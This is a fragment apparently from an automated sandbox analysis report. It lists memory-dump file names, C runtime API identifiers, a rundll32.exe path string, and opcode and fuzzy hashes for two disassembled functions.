                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 45ba72fe4d6bc6601358a4451b23ab019dc587979f9a9de09354cf8480663b79
                    • Instruction ID: da07d141b318197a2ba62a9642c8e5c63325d879fed9e0a20778bcf648305692
                    • Opcode Fuzzy Hash: 45ba72fe4d6bc6601358a4451b23ab019dc587979f9a9de09354cf8480663b79
                    • Instruction Fuzzy Hash: 92C04C3C609F829CFC162AB0A11619F13530F86DB7F9110C1ACD5571075B163A0A25B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 700082B9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                    • API String ID: 0-2837366778
                    • Opcode ID: d86e9d9a151d812508c7a0ec2a87812007af96d9c0d4f08ba7d5f38847c7d275
                    • Instruction ID: 41978f620ab2de21acff2d232855ebba2d7afbadfc6778b743a135e808a17e6d
                    • Opcode Fuzzy Hash: d86e9d9a151d812508c7a0ec2a87812007af96d9c0d4f08ba7d5f38847c7d275
                    • Instruction Fuzzy Hash: 764160B1E00214AFE722DB9AC881D9EBBFDFB85F31F10006AE545A7251D7B09A40DB90
                    Uniqueness

                    Uniqueness Score: -1.00%